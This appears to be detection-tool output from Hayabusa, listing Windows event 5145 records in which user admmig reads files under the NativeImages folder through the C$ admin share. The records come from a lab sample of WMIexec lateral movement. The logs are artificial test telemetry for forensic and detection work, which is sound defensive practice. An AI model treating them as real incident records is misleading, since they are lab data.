+2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#\4d5abc40df9ad72124f147d1d55dd690 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\004d51a9ac1d91d6537ad572591ebbd3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b7a83293c2e4f23480fc3660b70099e6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#\f8fa567f21f9aef0ae471c625b59c159 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#\5d1b6f60febb9cec91a92675a96ee63d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\b101a91893057573f159893cb9c2f28d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e037edd0e9a4a487424cd2d4e3527c92 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#\aaf7a4161dcd6792ce570a810a0c53f6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#\662c453241af44299325f4c07d7f718c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\154acb6c70e2dddd2c94bf0bc748b8b7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\9d9142f584dbdd4e6d4bd7fd6f877b66 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\ba928c3b8a0cdac392162a6b572de29f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#\1b67145a56e345e0d2e731357f498c1d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#\e857b644c45626101624d874e1860701 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#\1b9aff98baffeed692a8e8768c0c4e47 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\2f732bd1dcfeef1bb935c1d1444abdef | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\4844f53bd0e47d8f8a5795e6484a0f88 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#\a169d08938fb7766d16496db1e648137 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\75b419c806fb708ac368c6282c922a84 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\dd3aaf75f45749961d52d194dab801a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\e18185ddd154ffdd54cb6c9f0ee8bd44 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\c3205ecae7e5cd14582725a8b5e0d26b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#\a29f0b2b0504e328a9aa939a93159e40 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\46b29d8a49f03df40a948c722e1b8971 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\45a67d74e9938935daab6173a971be6c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
